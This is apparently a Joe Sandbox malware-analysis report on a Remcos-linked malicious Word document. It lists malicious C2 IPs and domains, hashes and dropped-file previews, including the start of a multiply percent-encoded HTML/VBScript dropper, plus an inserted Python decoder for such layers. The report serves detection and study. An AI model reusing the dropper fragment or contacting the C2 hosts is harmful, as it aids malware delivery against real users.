                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://policies.yahoo.com/w3c/p3p.xmlbhv2D0A.tmp.22.drfalse
                                                                                                                                        unknown
                                                                                                                                        http://crl.entrust.net/2048ca.crl0powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.msn.com/advertisement.ad.jsbhv2D0A.tmp.22.drfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.nirsoft.net8ECasPol.exe, 00000016.00000002.531106226.0000000000384000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://github.com/dahall/taskschedulerpowershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://www.ebuddy.comCasPol.exe, CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
Contacted IPs

IP               Domain                        Country        ASN    ASN Name           Malicious
142.250.181.238  drive.google.com              United States  15169  GOOGLEUS           false
45.90.89.98      servemail.exprotedsteel.pro   Bulgaria       33657  CMCSUS             true
24.199.88.84     u4u.kids                      United States  12271  TWC-12271-NYCUS    true
178.237.33.50    geoplugin.net                 Netherlands    8455   ATOM86-ASATOM86NL  false
216.58.212.129   drive.usercontent.google.com  United States  15169  GOOGLEUS           false
85.215.206.82    unknown                       Germany        6724   STRATOSTRATOAGDE   true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1540324
Start date and time: 2024-10-23 17:25:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 26
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO NAHK22012FA00000.docx.doc
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winDOC@28/44@11/6
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 202
• Number of non-executed functions: 292
Cookbook Comments:
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Execution Graph export aborted for target EQNEDT32.EXE, PID 3964 because there are no executed functions
• Execution Graph export aborted for target mshta.exe, PID 4040 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 1980 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                              • VT rate limit hit for: PO NAHK22012FA00000.docx.doc
                                                                                                                                              TimeTypeDescription
                                                                                                                                              11:26:28API Interceptor89x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                              11:26:36API Interceptor62x Sleep call for process: mshta.exe modified
                                                                                                                                              11:26:38API Interceptor541x Sleep call for process: powershell.exe modified
                                                                                                                                              11:26:49API Interceptor5x Sleep call for process: wscript.exe modified
                                                                                                                                              11:27:20API Interceptor683752x Sleep call for process: CasPol.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
45.90.89.98 | 1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exe | malicious | Remcos |
45.90.89.98 | na.rtf | malicious | Remcos |
45.90.89.98 | na.rtf | malicious | Remcos |
45.90.89.98 | na.rtf | malicious | Remcos |
45.90.89.98 | na.rtf | malicious | Remcos |
45.90.89.98 | 5fKvwnCAeC.vbs | malicious | Remcos, PureLog Stealer |
45.90.89.98 | AMG Cargo Logistic.docx | malicious | Remcos |
45.90.89.98 | factura proforma .docx.doc | malicious | Remcos |
45.90.89.98 | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer |
45.90.89.98 | gcnmTxDXTo.rtf | malicious | Remcos, PureLog Stealer |
24.199.88.84 | Logs.xls | malicious | Lokibot |
24.199.88.84 | Inv No.248740.xls | malicious | Unknown |
24.199.88.84 | InvoiceXCopy.xls | malicious | Snake Keylogger |
178.237.33.50 | ZW_PCCE-010023024001.bat | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | SecuriteInfo.com.Win32.Evo-gen.798.4975.exe | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | Unicredit.Pagamento.pdf.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | nicworkgbeeterworkgoodthingswithgereatniceforme.hta | malicious | Cobalt Strike, Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | EX0096959.docx.doc | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | BA4M310209H14956.xls | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | DHLShippingInvoicesAwbBL000000000102220242247.vbs | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | DHL AWB_NO_92847309329.exe | malicious | PureLog Stealer, Remcos | geoplugin.net/json.gp
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
servemail.exprotedsteel.pro | 1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exe | malicious | Remcos | 45.90.89.98
u4u.kids | Logs.xls | malicious | Lokibot | 24.199.88.84
u4u.kids | Inv No.248740.xls | malicious | Unknown | 24.199.88.84
u4u.kids | InvoiceXCopy.xls | malicious | Snake Keylogger | 24.199.88.84
geoplugin.net | ZW_PCCE-010023024001.bat | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | SecuriteInfo.com.Win32.Evo-gen.798.4975.exe | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | Unicredit.Pagamento.pdf.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | nicworkgbeeterworkgoodthingswithgereatniceforme.hta | malicious | Cobalt Strike, Remcos, DBatLoader | 178.237.33.50
geoplugin.net | EX0096959.docx.doc | malicious | Remcos | 178.237.33.50
geoplugin.net | BA4M310209H14956.xls | malicious | Remcos | 178.237.33.50
geoplugin.net | LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | DHLShippingInvoicesAwbBL000000000102220242247.vbs | malicious | Remcos | 178.237.33.50
geoplugin.net | DHL AWB_NO_92847309329.exe | malicious | PureLog Stealer, Remcos | 178.237.33.50
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
CMCSUS | 1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exe | malicious | Remcos | 45.90.89.98
CMCSUS | la.bot.sparc.elf | malicious | Unknown | 50.226.169.224
CMCSUS | la.bot.arm.elf | malicious | Unknown | 50.226.169.222
CMCSUS | mpsl.elf | malicious | Mirai | 50.226.169.219
CMCSUS | armv4l.elf | malicious | Mirai | 140.89.48.59
CMCSUS | gaber_mnr.ps1 | malicious | Metasploit, Xmrig | 50.220.121.211
CMCSUS | Kwwj1OiNtn.exe | malicious | Unknown | 45.89.247.20
CMCSUS | Kwwj1OiNtn.exe | malicious | Unknown | 45.89.247.20
CMCSUS | iKJsGpNTrF.elf | malicious | Unknown | 45.66.231.93
CMCSUS | na.elf | malicious | Mirai | 45.139.104.161
TWC-12271-NYCUS | Logs.xls | malicious | Lokibot | 24.199.88.84
TWC-12271-NYCUS | Inv No.248740.xls | malicious | Unknown | 24.199.88.84
TWC-12271-NYCUS | byte.mpsl.elf | malicious | Okiru | 68.174.131.114
TWC-12271-NYCUS | InvoiceXCopy.xls | malicious | Snake Keylogger | 24.199.88.84
TWC-12271-NYCUS | l6G93s9XLN.elf | malicious | Mirai | 68.173.141.203
TWC-12271-NYCUS | la.bot.arm5.elf | malicious | Unknown | 66.108.151.148
TWC-12271-NYCUS | la.bot.sh4.elf | malicious | Unknown | 72.231.14.8
TWC-12271-NYCUS | yakuza.m68k.elf | malicious | Unknown | 74.72.188.143
TWC-12271-NYCUS | la.bot.sparc.elf | malicious | Unknown | 24.90.54.210
TWC-12271-NYCUS | na.elf | malicious | Unknown | 24.161.155.135
ATOM86-ASATOM86NL | ZW_PCCE-010023024001.bat | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | SecuriteInfo.com.Win32.Evo-gen.798.4975.exe | malicious | Remcos, DBatLoader | 178.237.33.50
ATOM86-ASATOM86NL | Unicredit.Pagamento.pdf.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 1729665545edfb4dcad6b11392886f70983a48d15d8c5f732d18482fa331af6423098ce7b3187.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | nicworkgbeeterworkgoodthingswithgereatniceforme.hta | malicious | Cobalt Strike, Remcos, DBatLoader | 178.237.33.50
ATOM86-ASATOM86NL | EX0096959.docx.doc | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | BA4M310209H14956.xls | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | DHLShippingInvoicesAwbBL000000000102220242247.vbs | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | ceTv2SnPn9.elf | malicious | Mirai | 85.222.236.220
STRATOSTRATOAGDE | LlbpXphTu9.exe | malicious | Unknown | 81.169.145.95
STRATOSTRATOAGDE | byte.arm.elf | malicious | Okiru | 85.215.62.133
STRATOSTRATOAGDE | 6fLnWSoXXD.elf | malicious | Mirai | 81.169.217.50
STRATOSTRATOAGDE | SecuriteInfo.com.Win64.TrojanX-gen.21901.11051.exe | malicious | Unknown | 81.169.182.189
STRATOSTRATOAGDE | arm.elf | malicious | Mirai | 81.169.217.71
STRATOSTRATOAGDE | na.elf | malicious | Mirai | 81.169.217.60
STRATOSTRATOAGDE | HqvlYZC7Gf.exe | malicious | Unknown | 85.214.228.140
STRATOSTRATOAGDE | na.elf | malicious | Mirai, Okiru |
                                                                                                                                                                        • 81.169.242.82
                                                                                                                                                                        PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                        • 85.214.228.140
                                                                                                                                                                        08102024_1541_Beschwerde-Rechtsanwalt.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                        • 81.169.145.148
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
05af1f5ca1b87cc9cc9b25185115607dLogs.xls | malicious | Lokibot
• 142.250.181.238
• 216.58.212.129
• 24.199.88.84
InvoiceXCopy.xls | malicious | Snake Keylogger
• 142.250.181.238
• 216.58.212.129
• 24.199.88.84
CLOSURE.doc | malicious | Snake Keylogger, VIP Keylogger
• 142.250.181.238
• 216.58.212.129
• 24.199.88.84
oodforme.doc | malicious | Remcos
• 142.250.181.238
• 216.58.212.129
• 24.199.88.84
EX0096959.docx.doc | malicious | Remcos
• 142.250.181.238
• 216.58.212.129
• 24.199.88.84
SGS-Report0201024.xla.xlsx | malicious | FormBook
• 142.250.181.238
• 216.58.212.129
• 24.199.88.84
BA4M310209H14956.xls | malicious | Remcos
• 142.250.181.238
• 216.58.212.129
• 24.199.88.84
MT103-539 PAYMENT (1).docx.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
• 142.250.181.238
• 216.58.212.129
• 24.199.88.84
PaymentXConfirmationXcopy.xls | malicious | Snake Keylogger
• 142.250.181.238
• 216.58.212.129
• 24.199.88.84
76.xlam.xlsx | malicious | AgentTesla
• 142.250.181.238
• 216.58.212.129
• 24.199.88.84
7dcce5b76c8b17472d024758970a406bLogs.xls | malicious | Lokibot
• 24.199.88.84
Inv No.248740.xls | malicious | Unknown
• 24.199.88.84
InvoiceXCopy.xls | malicious | Snake Keylogger
• 24.199.88.84
EX0096959.docx.doc | malicious | Remcos
• 24.199.88.84
Inv No.248730.xls | malicious | Unknown
• 24.199.88.84
Oct2024TU-580.xls | malicious | Unknown
• 24.199.88.84
Inv No.248730.xls | malicious | Unknown
• 24.199.88.84
Purchase Order IOI 7300194 Data Sheet.xls | malicious | Unknown
• 24.199.88.84
SGS-Report0201024.xla.xlsx | malicious | FormBook
• 24.199.88.84
Purchase Order IOI 7300194 Data Sheet.xls | malicious | Unknown
• 24.199.88.84
No context
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):131072
                                                                                                                                                                        Entropy (8bit):0.025593217010028504
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:I3DPc3FvxggLR1bgvIqg/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPyJ9qGvYg3J/
                                                                                                                                                                        MD5:C4C34027D6BD02D908AC1B9AA9B58905
                                                                                                                                                                        SHA1:F53802BD01593E9055166DFCD19BD263FE1F6E57
                                                                                                                                                                        SHA-256:B10F7148DB75CFCC8D7F701FC0C8CD3AC9A574B1078591E25DC37C5772B955BA
                                                                                                                                                                        SHA-512:66B01FCB68C96C1B0F6E9FFF3E7309F6D2B3531B1869B585820297EAABE4E40D8DF7C3799137ADA7468DD5DFB76E96D95A53F3E4B7230B72D0F27800611128C1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:......M.eFy...z:.W..o.N.t..FH..S,...X.F...Fa.q............................".9.!.<G...............>.y.mD.X.k.L.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4760
                                                                                                                                                                        Entropy (8bit):4.834060479684549
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                                                                                                                        MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                                                                                                                        SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                                                                                                                        SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                                                                                                                        SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:@...e...........................................................
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:Rich Text Format data, version 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):87950
                                                                                                                                                                        Entropy (8bit):2.6460884092834385
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:OjO/O2+S+PXH9C+QwmXiTfgiK2l2xIPaa:gR2Dl+QtwDlca
                                                                                                                                                                        MD5:BFC7589C5992988E346361BA16E0F921
                                                                                                                                                                        SHA1:A546AAECD617E235E40362B626A2586636C39D65
                                                                                                                                                                        SHA-256:A4030FDB30504AAA2077873AAD15595B4D87BBFABAEB8AE1B245D6613941A591
                                                                                                                                                                        SHA-512:298C036894BB4FF1971DD2D9EA554872830B53D65DE0CC70770580E9276F6F1251F6A075407585268F6E292D15FDB3AB27E66CD3554E501D7A68D02E37842232
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthi[1].doc, Author: ditekSHen
                                                                                                                                                                        Preview:{\rtf1..{\*\u4CejNJYaQZlC85Z28jrieibfWIYwYrBS76sJxdQSFfic06eKWkOTLommHk4ogDr58LKQBGddTreO}..{\5265154797?./.86&63.1~=3??1##&+?.@5:~_.#,3.;[9$69,?9%'#?/%.1?3<?!7!?:9-3*622~5=''8?4]8?=)4;.8?>>?'6<;=$-|%(9@^5*,=(?%1&_``;/?.=.1|`3.]~?6#(*&?##?+_,||>@6.)7[@?3/[9.|?@(?#]^(!%3&)&%73%6`%.$^[?&?;?.*^<1[8][0[?$.|0?/4.8%3.~'./36??(8`*?.6?<@@2/-/=.%|5*|%;,]:19!$.%)(_=^()<>0,3=@!]@=?'!$-&(,-%3@,_0|>~].4;@,6!*5=|~2'%<?,^%)8-7%^0$.?&)?;0.^?-&?$+<1#//+-?,6*[(16<..`613)%>?@%?|2`6;<%&/2_#=>=@2.-8~.?+4;.-%#6%^9,^~_!?1803%'4#(.%2?!%%/*6'!]`((1;+?..``?._))0?,<53=@@9..9?-^,|&@~:^.@'|^&%|'%?`.`.-^.&?6/+)</6,]/?,.#!:8.!|?@0(;?/(4%,_2-2`9?`%-@!1%%5?>_.`!'&3;..:2-$&,.'0.@5:%=%_/2/?8?/][9:5=>.)3*~`6%3?-.|`/?#.-^~^?&?;)?<0]]/8,|?*.%;)<'!54?~<43.4[=~,&5`]%`#];)82-?!,]_@%?~9(2??-])6)./7+?5-`.!:~'(@-~.&:>*^1?/0@+.^5'?<93[.,'(7<7<&:&&%?5>'$.'>98'$'.3'/>:&80~`%..@'?+^^/40<#@+;2%&1?4?-&/5/*^??*?^?+](^??[#.2!?&)[+$??*0%>13?~_2`(:7~==*?,1]>5.5<3:<?./6`#<[**@>(`5<1~?#*6/#?_%.?:@%,?9?*~.0|[.%7$+32%>[~.,82))[%6/>95--$.+;<??
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):140662
Entropy (8bit):3.687456635992758
Encrypted:false
SSDEEP:3072:kSb7gt5pWGwiAON6gpvRwd07c3v9TVyr2HUDH:zKRRwd0eVTY2CH
MD5:E9D4662595A294AA122FB25CB9596E64
SHA1:62F49FFD85F901F68EEB23A3DE78D3A19E28D0F6
SHA-256:99D2EF08D3101CDFD89AFEA909815A7448200A7175A85D13C19B29DB084C7DD1
SHA-512:CD164953B1DDD6416611DB863F61B0FE69C5AA4271B033E5E72118F31D2FBD2E0440CFB37137768185D85692B56F11B7433212B1B858C248692CA13C163C6D1F
Malicious:false
Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .a.v.i.n.a.g.r.a.r.)..... . . . .d.i.m. .c.a.r.n.i.s.t.a.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .c.a.r.n.i.s.t.a..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .c.a.r.n.i.s.t.a.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.
Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
Category:dropped
Size (bytes):133688
Entropy (8bit):2.5311599425492504
Encrypted:false
SSDEEP:96:Eam7X/Ot9CLGFNOt9CaIGcHFX6k6m46FHHO7HxOt9CZ4Ot9CiimAb5WGwONOt9CH:Ea2Xmt4+Et4jlXPRt47t4SGEt4TT
MD5:02B4AB021D0F800EC41B06E11B8DA4AC
SHA1:767D0E4DDDF988CA60A9C1DFDA19B7CFC0D56B47
SHA-256:137502965371FE3D3DADD7C0BF9EB27103DCFD391E7676F322022F2C46DB9084
SHA-512:6F79B586DEE5CB23D152E31941CBA571C27F4C905C74F2E04BF534315D74132CDA92FBD2960367AFAF9936F7E7C68C3166C94BCEBD3F8C4B9783480F9A4B0A5A
Malicious:true
Preview:<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CscrIpT%252520laNGuAge%25253D%252522VbscRiPT%252522%25253E%25250ADim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
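The file EQNEDT32.EXE writes here is an HTML dropper whose whole body is one document.write(unescape(...)) call, and the preview shows the payload percent-encoded three times over (%3C, %253C, %25253C) before the <scrIpT laNGuAge="VbscRiPT"> block becomes readable. The block below is an added example, not code from the report or from the sample: a Python decoder that peels those layers with JavaScript unescape() semantics (%XX is a Latin-1 byte and %uXXXX is accepted, which is why urllib.parse.unquote is the wrong tool) and then lists the script engines the decoded page asks for, case-folded so that the mixed-case spelling cannot slip past a string match. The dropper it runs on is constructed to mirror the layering in the preview; the inner VBScript body is a placeholder statement, because the page does not show it.

```python
import re

# JavaScript unescape(): %XX -> chr(0xXX) (a Latin-1 byte, not UTF-8) and
# %uXXXX -> chr(0xXXXX). urllib.parse.unquote would mis-decode the former.
_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

def js_unescape(s):
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

# JavaScript escape(): everything except A-Z a-z 0-9 @ * _ + - . / is encoded.
# Used only to build the constructed sample below.
_SAFE = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@*_+-./")

def js_escape(s):
    out = []
    for ch in s:
        if ch in _SAFE:
            out.append(ch)
        elif ord(ch) < 256:
            out.append("%%%02X" % ord(ch))
        else:
            out.append("%%u%04X" % ord(ch))
    return "".join(out)

# A quoted literal containing %XX escapes: the argument of unescape(), either
# inline (unescape("%3C...")) or via a variable (m='%3C...'; unescape(m)).
_LITERAL = re.compile(r"""(["'])([^"'\n]*%[0-9A-Fa-f]{2}[^"'\n]*)\1""")

def peel(html, max_layers=16):
    """Return every layer from the dropper down to the plaintext document."""
    layers = [html]
    cur = html
    for _ in range(max_layers):
        if "unescape(" not in cur:
            break
        m = _LITERAL.search(cur)
        if not m:
            break
        cur = js_unescape(m.group(2))
        layers.append(cur)
    return layers

def script_languages(html):
    """Engines requested by <script language=...> tags, lower-cased so that
    the spelling scrIpT laNGuAge="VbscRiPT" matches like any other."""
    return [lang.lower() for lang in
            re.findall(r"<script\b[^>]*\blanguage\s*=\s*[\"']?([A-Za-z]+)", html, re.I)]

# Constructed plaintext modelled on what the preview decodes to; the real
# VBScript body is not on the page, so one placeholder statement stands in.
SAMPLE_INNER = (
    '<!DOCTYPE html>\n'
    '<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >\n'
    '<html>\n<body>\n'
    '<scrIpT laNGuAge="VbscRiPT">\n'
    'Dim\t\t\tplaceholder\n'
    '</scrIpT>\n</body>\n</html>'
)

def wrap(doc):
    # One layer as the dropper builds it: m='<escaped>'; document.write(unescape(m))
    return "<script language=JavaScript>m='" + js_escape(doc) + "';document.write(unescape(m))</script>"

# Two wrapped layers inside an outer unescape("...") call: three decodes in all
SAMPLE_DROPPER = ('<script>\n document.write(unescape("'
                  + js_escape(wrap(wrap(SAMPLE_INNER))) + '"))\n</script>')

if __name__ == "__main__":
    for depth, layer in enumerate(peel(SAMPLE_DROPPER)):
        print(f"layer {depth}: {len(layer)} chars, starts {layer[:40]!r}")
    print("script languages:", script_languages(peel(SAMPLE_DROPPER)[-1]))
```

Running the script on a real dropped file means reading it as text and handing it to peel(); the constructed sample reproduces the encoded prefix visible in the preview exactly, so the same call chain applies. The loop stops as soon as a layer no longer calls unescape(), which is where the VBScript becomes readable and the analysis of what it does begins.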
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:JSON data
Category:dropped
Size (bytes):957
Entropy (8bit):5.008511330476407
Encrypted:false
SSDEEP:12:tksnd61GkMyGWKyGXPVGArwY3OHfv+oQasHuGHmArpv/mOAaNO+ao9W7iN5zzkwQ:qUdluKyGX85jHf3SvXhNlT3/7YvfbYro
MD5:F2892DD2C0877EA2A51B1A178A1655FC
SHA1:3AD11A0C61DFCD7AC260659F0F42BF99E0D1DD06
SHA-256:A8BD5E77C30BECDD2CF64792CA633F4255BC8AFB54270F760BEA2E58E1432091
